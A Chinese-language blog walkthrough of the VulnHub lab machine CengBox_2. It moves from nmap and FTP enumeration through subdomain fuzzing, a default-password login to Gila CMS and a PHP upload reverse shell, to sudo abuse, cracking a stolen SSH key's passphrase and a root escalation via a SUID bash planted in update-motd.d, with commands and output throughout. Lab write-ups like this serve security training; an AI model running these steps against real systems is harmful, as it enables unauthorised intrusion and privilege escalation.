CengBox_2 靶机

CengBox_2 靶机

信息收集

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.103

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

开放了 21, 22, 80 端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.168.1.103

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             209 May 23  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.101
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
|   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:A4:96:C9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ubuntu 操作系统,先看看 ftp 匿名登录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 3.0.3)
Name (192.168.1.103:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls 
229 Entering Extended Passive Mode (|||27250|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             209 May 23  2020 note.txt
ftp> get note.txt

下载到本地后查看

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ cat note.txt                                  
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron

我们最直观的是拿到了两个人名,其次是对于 ceng-company.vm ,是一个域名,并且已经 created a new area 可能是指域名下的路径。尝试将域名与 IP 映射写入到 hosts 文件中。同时还有个点是默认密码,后续应该会用到。

目录爆破

1
2
3
4
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo dirsearch -u http://192.168.1.103/

[11:08:21] 200 -  555B  - /index.html

反复换了几个字典和工具,发现没有目录。不得不重新思考 created a new area for you 的真正含义。

子域名爆破

尝试一下子域名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u ceng-company.vm -H "Host:FUZZ.ceng-company.vm" --hw 76 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ceng-company.vm/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                            
=====================================================================

000000024:   403        11 L     32 W       296 Ch      "admin"                                            
000002700:   400        12 L     53 W       422 Ch      "m."                                               
000002795:   400        12 L     53 W       422 Ch      "ns2.cl.bellsouth.net."                            
000002885:   400        12 L     53 W       422 Ch      "ns2.viviotech.net."                               
000002883:   400        12 L     53 W       422 Ch      "ns1.viviotech.net."                               
000003050:   400        12 L     53 W       422 Ch      "ns3.cl.bellsouth.net."                            
000004083:   400        12 L     53 W       422 Ch      "quatro.oweb.com."                                 
000004081:   400        12 L     53 W       422 Ch      "ferrari.fortwayne.com."                           
000004082:   400        12 L     53 W       422 Ch      "jordan.fortwayne.com."                            

Total time: 4.585479
Processed Requests: 5000
Filtered Requests: 4991
Requests/sec.: 1090.398

admin 作为子域名的前缀,返回是 403,或许这就是我们要找的。将子域名和 IP 的映射写入 hosts 文件

目录爆破

虽然网站根目录没有权限,但是不妨碍我们进行目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -xphp,txt,html
===============================================================
[+] Url:                     http://admin.ceng-company.vm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
/.html                (Status: 403) [Size: 301]
/.php                 (Status: 403) [Size: 300]
/.php                 (Status: 403) [Size: 300]
/.html                (Status: 403) [Size: 301]
/server-status        (Status: 403) [Size: 309]
/gila                 (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]
Progress: 881756 / 882244 (99.94%)

我先尝试了 dirsearch 没有收获,再尝试使用 gobuster 指定字典,才发现了 /gila 路径

Gila CMS 尝试使用这个关键词来搜 exp

的确发现了一些 exp,但是本地文件包含漏洞利用失败,远程命令执行漏洞没反应,不确定是否有次漏洞。不过利用漏洞的过程中,发现了 cms 的登录界面

用户邮箱猜测与弱口令

别忘了 note.txt 中还有提示即此界面大概率使用的是默认密码,但是搜索此 cms 安装文档发现,并没有直接指定的默认密码,那就只能猜测是弱口令了。还有个问题是登录名必须是 email,猜测可能是用户名和域名之类的组合

尝试了 kevin@ceng-company.vm:rootkevin@ceng-company.vm:admin

后者成功登录了系统。在这里可以上传文件也可以直接修改文件

我这里尝试上传 php 文件,上传后文件被放入了 assets 文件夹

反弹 shell

提前开启监听,访问 http://admin.ceng-company.vm/gila/assets/1.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo nc -lvnp 443                            
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.103] 45420
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 20:36:52 up 12:48,  0 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a4:96:c9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.103/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fea4:96c9/64 scope link 
       valid_lft forever preferred_lft forever
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cengbox:/var/www/admin/gila$ sudo -l
sudo -l
Matching Defaults entries for www-data on cengbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cengbox:
    (swartz) NOPASSWD: /home/swartz/runphp.sh

用户切换

1
2
3
4
5
6
7
8
9
www-data@cengbox:/var/www/admin/gila$ sudo -u swartz /home/swartz/runphp.sh
sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.
php > system("/bin/bash");
system("/bin/bash");
swartz@cengbox:/var/www/admin/gila$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
swartz@cengbox:~$ ls -liah
ls -liah
total 44K
146972 drwxr-xr-x 4 swartz swartz     4.0K May 26  2020 .
390272 drwxr-xr-x 4 root   root       4.0K May 23  2020 ..
153153 -rw------- 1 swartz swartz        1 May 26  2020 .bash_history
152982 -rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
152981 -rw-r--r-- 1 swartz swartz     3.7K Aug 31  2015 .bashrc
521119 drwx------ 2 swartz swartz     4.0K May 23  2020 .cache
153323 drwx------ 2 swartz developers 4.0K May 26  2020 .gnupg
153151 -rw------- 1 swartz developers   34 Oct 16 20:43 .php_history
152881 -rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
155694 -rw------- 1 swartz developers    1 May 26  2020 .viminfo
153171 -rwxr-xr-x 1 swartz swartz       20 May 26  2020 runphp.sh
swartz@cengbox:~$ cat .bash_history
cat .bash_history

swartz@cengbox:~$ sudo -l
sudo -l
[sudo] password for swartz:

查看其他用户的家目录时,发现了私钥文件

1
2
3
4
5
6
7
8
swartz@cengbox:/home/mitnick/.ssh$ ls -alih
ls -alih
total 20K
403733 drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .
414532 drwxr-x--- 6 mitnick developers 4.0K Oct 16 22:13 ..
403829 -rw-r--r-- 1 mitnick developers  397 May 25  2020 authorized_keys
407541 -rw-r--r-- 1 mitnick developers 1.8K May 25  2020 id_rsa
407548 -rw-r--r-- 1 mitnick developers  397 May 25  2020 id_rsa.pub

私钥泄露

直接复制粘贴到本地,出现了问题:Load key "id_rsa": error in libcrypto

可能是直接复制 linpeas 的结果导致的,猜测是是编码或者格式的问题,可以直接将原文件下载到本地,也可以使用 cat 命令查看 id_rsa 文件。修改其权限,尝试私钥登录,提示需要 passphrase,john 爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ssh2john id_rsa > sshhash

┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ sudo john sshhash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
legend           (id_rsa)     
1g 0:00:00:00 DONE (2023-10-17 01:03) 100.0g/s 195200p/s 195200c/s 195200C/s amore..mandy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/Documents/CengBox2]
└─$ ssh -i id_rsa mitnick@192.168.1.103     
Enter passphrase for key 'id_rsa': 

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

166 packages can be updated.
119 updates are security updates.

Last login: Mon Oct 16 22:03:42 2023 from 192.168.1.101
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
mitnick@cengbox:~$ ls -alih
total 48K
414532 drwxr-x--- 4 mitnick developers 4.0K May 25  2020 .
390272 drwxr-xr-x 4 root    root       4.0K May 23  2020 ..
407565 -rw------- 1 mitnick mitnick      40 Oct 16 22:04 .bash_history
402634 -rw-r--r-- 1 mitnick mitnick     220 May 23  2020 .bash_logout
402595 -rw-r--r-- 1 mitnick mitnick    3.7K May 23  2020 .bashrc
414533 drwx------ 2 mitnick mitnick    4.0K May 23  2020 .cache
407529 -rw------- 1 mitnick mitnick     505 May 23  2020 .mysql_history
407543 -rw------- 1 mitnick mitnick       1 May 26  2020 .php_history
390954 -rw-r--r-- 1 mitnick mitnick     655 May 23  2020 .profile
403733 drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .ssh
391963 -rw------- 1 mitnick mitnick      33 May 23  2020 user.txt
407544 -rw------- 1 mitnick mitnick       1 May 26  2020 .viminfo
mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362

历史文件简单查看后没发现什么有价值的信息

SUID、定时任务文件、passwd 和 shadow 文件权限查看后没发现可利用的点。

MOTD 提权

linpeas 来信息收集一下

或许可以利用,翻一翻常用的提权手法,发现了 MOTD 提权

1
mitnick@cengbox:~$ echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /etc/update-motd.d/00-header

然后 exit/logout 先退出再重新登录 ssh

不过写在这个文件里似乎没反应,换个文件写试试(记得 cat 查看一下确保写进去了)

1
mitnick@cengbox:/etc/update-motd.d$ echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /etc/update-motd.d/10-help-text

重新登录后,成功。

1
2
3
4
5
mitnick@cengbox:~$ ls -liha /tmp
total 4.9M
   133 drwxrwxrwt 10 root    root        4.0K Oct 16 22:46 .
     2 drwxr-xr-x 23 root    root        4.0K May 23  2020 ..
 15013 -rwsr-xr-x  1 root    root       1014K Oct 16 22:46 bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
mitnick@cengbox:~$ /tmp/bash -p
bash-4.3# cd /root
bash-4.3# ls -liah
total 36K
   15 drwx------  3 root root 4.0K May 26  2020 .
    2 drwxr-xr-x 23 root root 4.0K May 23  2020 ..
15009 -rw-------  1 root root    0 May 26  2020 .bash_history
   16 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
16298 drwxr-xr-x  2 root root 4.0K May 23  2020 .nano
15008 -rw-------  1 root root    1 May 26  2020 .php_history
   17 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
15012 -rw-r--r--  1 root root  518 May 23  2020 root.txt
14996 -rw-r--r--  1 root root   66 May 23  2020 .selected_editor
15011 -rw-------  1 root root    1 May 26  2020 .viminfo
bash-4.3# cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_

de89782fe4e8bf2198a022ae7f50613e

最后来个定妆照

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bash-4.3# whoami
root
bash-4.3# id
uid=1000(mitnick) gid=1002(developers) euid=0(root) groups=1002(developers),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
bash-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a4:96:c9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.103/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fea4:96c9/64 scope link 
       valid_lft forever preferred_lft forever
3: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
    link/ether 4e:77:e0:ff:98:b7 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::4c77:e0ff:feff:98b7/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::1/64 scope link 
       valid_lft forever preferred_lft forever
bash-4.3# uname -a
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
knowledge_database > vulnhub
CengBox_2 靶机
https://i3eg1nner.github.io/2023/10/be5fd2fbc403.html
作者
I3eg1nner
发布于
2023年10月17日
许可协议